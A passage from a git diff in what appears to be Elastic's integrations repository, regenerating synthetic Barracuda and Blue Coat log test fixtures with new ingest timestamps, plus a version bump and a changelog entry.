"version": "1.12.0" - }, "message": "UPDATE: [ALERT:aliquaU] New attack definition version 1.1278 is available", "event": { - "ingested": "2021-06-09T09:46:41.485181800Z" + "ingested": "2021-12-14T14:35:58.799899177Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "UPDATE: [ALERT:amei] New attack definition version 1.7778 is available", "event": { - "ingested": "2021-06-09T09:46:41.485185400Z" + "ingested": "2021-12-14T14:35:58.799899544Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "UPDATE: [ALERT:gelitse] New attack definition version 1.3018 is available", "event": { - "ingested": "2021-06-09T09:46:41.485188800Z" + "ingested": "2021-12-14T14:35:58.799899902Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "INSTALL: Migrating configuration from iceroin to qui", "event": { - "ingested": "2021-06-09T09:46:41.485192500Z" + "ingested": "2021-12-14T14:35:58.799900277Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "INSTALL: Migrating configuration from pariatu to issusc", "event": { - "ingested": "2021-06-09T09:46:41.485196300Z" + "ingested": "2021-12-14T14:35:58.799900709Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "STM: FAILOVE-roinBCSe oreet Stateful Failover Module initialized.", "event": { - "ingested": "2021-06-09T09:46:41.485199800Z" + "ingested": "2021-12-14T14:35:58.799901066Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "STM_WRAPPER: Committing UI configuration.", "event": { - "ingested": "2021-06-09T09:46:41.485203300Z" + "ingested": 
"2021-12-14T14:35:58.799901422Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "STM_WRAPPER: Rolling back the current database transaction. Configuration digest failed.", "event": { - "ingested": "2021-06-09T09:46:41.485206900Z" + "ingested": "2021-12-14T14:35:58.799901783Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "INSTALL: Migrating configuration from ernat to Ute", "event": { - "ingested": "2021-06-09T09:46:41.485210400Z" + "ingested": "2021-12-14T14:35:58.799902150Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "STM_WRAPPER: Rolling back the current database transaction. Configuration digest failed.", "event": { - "ingested": "2021-06-09T09:46:41.485213900Z" + "ingested": "2021-12-14T14:35:58.799902511Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "STM_WRAPPER: Successfully initialized STM.", "event": { - "ingested": "2021-06-09T09:46:41.485217200Z" + "ingested": "2021-12-14T14:35:58.799902863Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "STM: RespPage-rinrepr rvelill CreateRP: Response Page mve created successfully", "event": { - "ingested": "2021-06-09T09:46:41.485220700Z" + "ingested": "2021-12-14T14:35:58.799903213Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "STM_WRAPPER: [ALERT:ineav] Configuration size is onp which exceeds the gnaaliqu safe limit. 
Please check your configuration.", "event": { - "ingested": "2021-06-09T09:46:41.485224100Z" + "ingested": "2021-12-14T14:35:58.799903568Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "BYPASS: Mode set to never bypass.", "event": { - "ingested": "2021-06-09T09:46:41.485227400Z" + "ingested": "2021-12-14T14:35:58.799903924Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "CONFIG_AGENT: quaea RPC Name =eetd, RPC Result: fdeFin", "event": { - "ingested": "2021-06-09T09:46:41.485230700Z" + "ingested": "2021-12-14T14:35:58.799904313Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "PROCMON: number of stm worker threads isrro", "event": { - "ingested": "2021-06-09T09:46:41.485234100Z" + "ingested": "2021-12-14T14:35:58.799904679Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "CONFIG_AGENT: tutlabo Initiating config_agent database commit phase.", "event": { - "ingested": "2021-06-09T09:46:41.485237500Z" + "ingested": "2021-12-14T14:35:58.799905033Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "INSTALL: Loading the snapshot for pli release.", "event": { - "ingested": "2021-06-09T09:46:41.485241100Z" + "ingested": "2021-12-14T14:35:58.799905383Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "CONFIG_AGENT: erit Initiating config_agent database commit phase.", "event": { - "ingested": "2021-06-09T09:46:41.485244700Z" + "ingested": "2021-12-14T14:35:58.799905738Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - 
"version": "1.12.0" - }, "message": "INSTALL: Loading the snapshot for mod release.", "event": { - "ingested": "2021-06-09T09:46:41.485248Z" + "ingested": "2021-12-14T14:35:58.799906112Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "INSTALL: Loading the snapshot for lamcolab release.", "event": { - "ingested": "2021-06-09T09:46:41.485251500Z" + "ingested": "2021-12-14T14:35:58.799906464Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "INSTALL: Migrating configuration from estlab to tis", "event": { - "ingested": "2021-06-09T09:46:41.485255100Z" + "ingested": "2021-12-14T14:35:58.799906821Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "PROCMON: [ALERT:uamqua] Firmware storage exceeds labo", "event": { - "ingested": "2021-06-09T09:46:41.485258500Z" + "ingested": "2021-12-14T14:35:58.799907184Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "INSTALL: Migrating configuration from tfugit to taspern", "event": { - "ingested": "2021-06-09T09:46:41.485262Z" + "ingested": "2021-12-14T14:35:58.799908502Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "eventmgr: Forwarding log messages to syslog host #meiusm, address=10.48.248.158", "event": { - "ingested": "2021-06-09T09:46:41.485265600Z" + "ingested": "2021-12-14T14:35:58.799908954Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "STM_WRAPPER: Successfully initialized STM.", "event": { - "ingested": "2021-06-09T09:46:41.485269200Z" + "ingested": "2021-12-14T14:35:58.799909318Z" + }, + "ecs": { + "version": 
"1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "PROCMON: number of stm worker threads isonula", "event": { - "ingested": "2021-06-09T09:46:41.485272600Z" + "ingested": "2021-12-14T14:35:58.799909681Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "STM: FTPSVC-nimi ilmoles Ftp proxy initialized labor", "event": { - "ingested": "2021-06-09T09:46:41.485276900Z" + "ingested": "2021-12-14T14:35:58.799910034Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "PROCMON: [ALERT:atev] One of the RAID arrays is degrading.", "event": { - "ingested": "2021-06-09T09:46:41.485280400Z" + "ingested": "2021-12-14T14:35:58.799910387Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "CONFIG_AGENT: amaliq ept Received put-tree command", "event": { - "ingested": "2021-06-09T09:46:41.485283800Z" + "ingested": "2021-12-14T14:35:58.799910764Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "BYPASS: Mode set to BYPASS (ectetura).", "event": { - "ingested": "2021-06-09T09:46:41.485287300Z" + "ingested": "2021-12-14T14:35:58.799911115Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "STM: COOKIE-icab quiado scipit = quiavolu", "event": { - "ingested": "2021-06-09T09:46:41.485290800Z" + "ingested": "2021-12-14T14:35:58.799911468Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "BYPASS: Mode set to never bypass.", "event": { - "ingested": "2021-06-09T09:46:41.485294400Z" + "ingested": "2021-12-14T14:35:58.799911818Z" + }, + "ecs": { + 
"version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "STM: CACHE-oconseq tsedd untin SapCtx susc, SapId amr, Return Code success", "event": { - "ingested": "2021-06-09T09:46:41.485297800Z" + "ingested": "2021-12-14T14:35:58.799912188Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "STM: aps-ddoeius tautfugi ParamProtectionClonePatterns: Old:cin, New:fugia, PatternsNode:olors", "event": { - "ingested": "2021-06-09T09:46:41.485301300Z" + "ingested": "2021-12-14T14:35:58.799912544Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "INSTALL: Loading the snapshot for admi release.", "event": { - "ingested": "2021-06-09T09:46:41.485304700Z" + "ingested": "2021-12-14T14:35:58.799912904Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "CONFIG_AGENT: aecons Initiating config_agent database commit phase.", "event": { - "ingested": "2021-06-09T09:46:41.485308300Z" + "ingested": "2021-12-14T14:35:58.799913271Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "PROCMON: Monitoring links: eth801", "event": { - "ingested": "2021-06-09T09:46:41.485312Z" + "ingested": "2021-12-14T14:35:58.799913631Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "PROCMON: Started monitoring", "event": { - "ingested": "2021-06-09T09:46:41.485315600Z" + "ingested": "2021-12-14T14:35:58.799913986Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "UPDATE: [ALERT:ntoc] New attack definition version 1.7781 is available", "event": { - 
"ingested": "2021-06-09T09:46:41.485319200Z" + "ingested": "2021-12-14T14:35:58.799914351Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "INSTALL: Loading the snapshot for stru release.", "event": { - "ingested": "2021-06-09T09:46:41.485322700Z" + "ingested": "2021-12-14T14:35:58.799914719Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "PROCMON: Monitoring links: enp0s6182", "event": { - "ingested": "2021-06-09T09:46:41.485326200Z" + "ingested": "2021-12-14T14:35:58.799915070Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "PROCMON: number of stm worker threads isumwri", "event": { - "ingested": "2021-06-09T09:46:41.485329600Z" + "ingested": "2021-12-14T14:35:58.799915431Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "BYPASS: Mode set to never bypass.", "event": { - "ingested": "2021-06-09T09:46:41.485333100Z" + "ingested": "2021-12-14T14:35:58.799915784Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "BYPASS: Mode set to BYPASS (eniamqu).", "event": { - "ingested": "2021-06-09T09:46:41.485336700Z" + "ingested": "2021-12-14T14:35:58.799916136Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "UPDATE: [ALERT:tco] New attack definition version 1.6840 is available", "event": { - "ingested": "2021-06-09T09:46:41.485340400Z" + "ingested": "2021-12-14T14:35:58.799916487Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "STM_WRAPPER: Successfully initialized STM.", "event": 
{ - "ingested": "2021-06-09T09:46:41.485343900Z" + "ingested": "2021-12-14T14:35:58.799916843Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "STM_WRAPPER: Initializing STM.", "event": { - "ingested": "2021-06-09T09:46:41.485347600Z" + "ingested": "2021-12-14T14:35:58.799917195Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "STM_WRAPPER: Successfully initialized STM.", "event": { - "ingested": "2021-06-09T09:46:41.485351200Z" + "ingested": "2021-12-14T14:35:58.799917548Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "PROCMON: Started monitoring", "event": { - "ingested": "2021-06-09T09:46:41.485354800Z" + "ingested": "2021-12-14T14:35:58.799917898Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" diff --git a/packages/barracuda/manifest.yml b/packages/barracuda/manifest.yml index 505b7dc42fc..c63dddf2464 100644 --- a/packages/barracuda/manifest.yml +++ b/packages/barracuda/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: barracuda title: Barracuda Logs -version: 0.7.0 +version: 0.7.1 description: Collect spam and web application firewall logs from Barracuda devices with Elastic Agent. categories: ["network", "security"] release: experimental diff --git a/packages/bluecoat/changelog.yml b/packages/bluecoat/changelog.yml index 68563ce7859..9dda70fbbe5 100644 --- a/packages/bluecoat/changelog.yml +++ b/packages/bluecoat/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.6.1" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "0.6.0" changes: - description: Add 8.0.0 version constraint 
diff --git a/packages/bluecoat/data_stream/director/_dev/test/pipeline/test-generated.log-expected.json b/packages/bluecoat/data_stream/director/_dev/test/pipeline/test-generated.log-expected.json index b82c39c89cc..39bf58fd7f2 100644 --- a/packages/bluecoat/data_stream/director/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/bluecoat/data_stream/director/_dev/test/pipeline/test-generated.log-expected.json 
@@ -1,1200 +1,1200 @@ { "expected": [ { - "ecs": { - "version": "1.12.0" - }, "message": "ntpd[1001]: kernel time sync enabled utl", "event": { - "ingested": "2021-06-09T09:50:38.142122500Z" + "ingested": "2021-12-14T14:36:02.455690762Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "restorecond: : Reset file context quasiarc: liqua", "event": { - "ingested": "2021-06-09T09:50:38.142166900Z" + "ingested": "2021-12-14T14:36:02.455693347Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "auditd[5699]: Audit daemon rotating log files", "event": { - "ingested": "2021-06-09T09:50:38.142174400Z" + "ingested": "2021-12-14T14:36:02.455693771Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "anacron[5066]: Normal exit ehend", "event": { - "ingested": "2021-06-09T09:50:38.142200100Z" + "ingested": "2021-12-14T14:36:02.455694124Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "restorecond: : Reset file context vol: luptat", "event": { - "ingested": "2021-06-09T09:50:38.142206600Z" + "ingested": "2021-12-14T14:36:02.455694475Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "heartbeat: : \u003c\u003ceumiu.medium\u003e Processing command: accept", "event": { - "ingested": "2021-06-09T09:50:38.142212600Z" + "ingested": "2021-12-14T14:36:02.455694839Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "restorecond: : Reset file context nci: ofdeFin", "event": { - "ingested": "2021-06-09T09:50:38.142219100Z" + "ingested": "2021-12-14T14:36:02.455695226Z" + }, + "ecs": { + 
"version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "auditd[6668]: Audit daemon rotating log files", "event": { - "ingested": "2021-06-09T09:50:38.142224500Z" + "ingested": "2021-12-14T14:36:02.455695588Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "anacron[1613]: Normal exit mvolu", "event": { - "ingested": "2021-06-09T09:50:38.142229400Z" + "ingested": "2021-12-14T14:36:02.455695955Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ntpd[2959]: ntpd gelit-r tatno", "event": { - "ingested": "2021-06-09T09:50:38.142234600Z" + "ingested": "2021-12-14T14:36:02.455696317Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "anacron[654]: Updated timestamp for job rmagni to sit", "event": { - "ingested": "2021-06-09T09:50:38.142240900Z" + "ingested": "2021-12-14T14:36:02.455696691Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "dmd: : \u003c\u003ctenima.very-high\u003e Health state for metric\"seq3874.mail.domain\" \"quid\" changed to \"fug\", reason: \"success\"", "event": { - "ingested": "2021-06-09T09:50:38.142246200Z" + "ingested": "2021-12-14T14:36:02.455697267Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "auditd[2067]: Audit daemon rotating log files", "event": { - "ingested": "2021-06-09T09:50:38.142251Z" + "ingested": "2021-12-14T14:36:02.455697654Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "pm[5969]: \u003c\u003ctquovol.very-high\u003e check_license_validity(), tae", "event": { - 
"ingested": "2021-06-09T09:50:38.142256Z" + "ingested": "2021-12-14T14:36:02.455698011Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logrotate: : ALERT exited abnormally with temUten", "event": { - "ingested": "2021-06-09T09:50:38.142260800Z" + "ingested": "2021-12-14T14:36:02.455698369Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "sshd: : \u003c\u003cdun.medium\u003e error: Bind to port Duisau on psum failed: failure", "event": { - "ingested": "2021-06-09T09:50:38.142265900Z" + "ingested": "2021-12-14T14:36:02.455699341Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "configd: : \u003c\u003cend.medium\u003e itaut@rveli: command: accept", "event": { - "ingested": "2021-06-09T09:50:38.142270700Z" + "ingested": "2021-12-14T14:36:02.455699852Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "authd: : \u003c\u003cluptat.low\u003e authd_signal_handler(), quam", "event": { - "ingested": "2021-06-09T09:50:38.142282300Z" + "ingested": "2021-12-14T14:36:02.455700210Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "xinetd[6547]: Started working: onproide available services", "event": { - "ingested": "2021-06-09T09:50:38.142287Z" + "ingested": "2021-12-14T14:36:02.455700562Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logrotate: : ALERT exited abnormally with tfug", "event": { - "ingested": "2021-06-09T09:50:38.142292Z" + "ingested": "2021-12-14T14:36:02.455700920Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - 
"ecs": { - "version": "1.12.0" - }, "message": "heartbeat: : \u003c\u003curE.medium\u003e Processing command: deny", "event": { - "ingested": "2021-06-09T09:50:38.142297200Z" + "ingested": "2021-12-14T14:36:02.455701280Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "rsyslogd: : Warning: rehe", "event": { - "ingested": "2021-06-09T09:50:38.142302700Z" + "ingested": "2021-12-14T14:36:02.455701636Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "sshd: : \u003c\u003cstiae.medium\u003e error: Bind to port erc on amqu failed: unknown", "event": { - "ingested": "2021-06-09T09:50:38.142369500Z" + "ingested": "2021-12-14T14:36:02.455702020Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ntpd[4515]: ntpd emp-r aperia", "event": { - "ingested": "2021-06-09T09:50:38.142377200Z" + "ingested": "2021-12-14T14:36:02.455702500Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "restorecond: : Reset file context run: vol", "event": { - "ingested": "2021-06-09T09:50:38.142383100Z" + "ingested": "2021-12-14T14:36:02.455702861Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logrotate: : ALERT exited abnormally with mporain", "event": { - "ingested": "2021-06-09T09:50:38.142388100Z" + "ingested": "2021-12-14T14:36:02.455703217Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "heartbeat: : \u003c\u003cmpori.very-high\u003e connect: atu", "event": { - "ingested": "2021-06-09T09:50:38.142393Z" + "ingested": "2021-12-14T14:36:02.455703578Z" + }, + "ecs": { + "version": "1.12.0" 
}, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "cmd: : \u003c\u003ctexp.medium\u003e cmd starting adeseru", "event": { - "ingested": "2021-06-09T09:50:38.142398200Z" + "ingested": "2021-12-14T14:36:02.455703931Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "cli[7108]: \u003c\u003c-uam.low\u003e tmo@::fficiade:10.2.53.125 : CLI launched", "event": { - "ingested": "2021-06-09T09:50:38.142402700Z" + "ingested": "2021-12-14T14:36:02.455704301Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "pm[7061]: \u003c\u003cihilmo.very-high\u003e ntpd will start in tlabo", "event": { - "ingested": "2021-06-09T09:50:38.142407300Z" + "ingested": "2021-12-14T14:36:02.455704656Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "poller[795]: \u003c\u003coluptate.low\u003e Querying content system for job results.", "event": { - "ingested": "2021-06-09T09:50:38.142412Z" + "ingested": "2021-12-14T14:36:02.455705009Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "runner[6134]: \u003c\u003cedo.very-high\u003e Processing command: allow", "event": { - "ingested": "2021-06-09T09:50:38.142416400Z" + "ingested": "2021-12-14T14:36:02.455705375Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "epmd: : epmd: epmd running orpor", "event": { - "ingested": "2021-06-09T09:50:38.142420900Z" + "ingested": "2021-12-14T14:36:02.455705739Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "runner[602]: \u003c\u003cemvel.very-high\u003e Failed to exec 
olup", "event": { - "ingested": "2021-06-09T09:50:38.142427300Z" + "ingested": "2021-12-14T14:36:02.455706100Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "shutdown[2807]: shutting down non", "event": { - "ingested": "2021-06-09T09:50:38.142431800Z" + "ingested": "2021-12-14T14:36:02.455706592Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "configd: : \u003c\u003cugiatnu.high\u003e sperna@sintocc: command: cancel", "event": { - "ingested": "2021-06-09T09:50:38.142436Z" + "ingested": "2021-12-14T14:36:02.455706964Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "auditd[2986]: Audit daemon rotating log files", "event": { - "ingested": "2021-06-09T09:50:38.142440200Z" + "ingested": "2021-12-14T14:36:02.455707323Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "configd: : \u003c\u003cccaecat.medium\u003e CREATE onsequ", "event": { - "ingested": "2021-06-09T09:50:38.142444200Z" + "ingested": "2021-12-14T14:36:02.455707670Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "auditd[1243]: Audit daemon rotating log files", "event": { - "ingested": "2021-06-09T09:50:38.142448100Z" + "ingested": "2021-12-14T14:36:02.455708026Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "xinetd[6599]: Started working: naal available services", "event": { - "ingested": "2021-06-09T09:50:38.142452100Z" + "ingested": "2021-12-14T14:36:02.455708385Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, 
"message": "xinetd[5850]: Started working: rQu available services", "event": { - "ingested": "2021-06-09T09:50:38.142456100Z" + "ingested": "2021-12-14T14:36:02.455708744Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "heartbeat: : \u003c\u003cboree.low\u003e queips: undefined symbol: ncidi", "event": { - "ingested": "2021-06-09T09:50:38.142460100Z" + "ingested": "2021-12-14T14:36:02.455709093Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "authd: : \u003c\u003color.very-high\u003e authd_close(): npr", "event": { - "ingested": "2021-06-09T09:50:38.142469300Z" + "ingested": "2021-12-14T14:36:02.455709454Z" }, - "tags": [ + "ecs": { + "version": "1.12.0" + }, + "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "anacron[6373]: Anacron 1.3962 started on epre", "event": { - "ingested": "2021-06-09T09:50:38.142473500Z" + "ingested": "2021-12-14T14:36:02.455709867Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "cli[3979]: \u003c\u003c-iduntu.medium\u003e temUt@avol752.www5.test : Processing command accept", "event": { - "ingested": "2021-06-09T09:50:38.142477500Z" + "ingested": "2021-12-14T14:36:02.455710242Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "cmd: 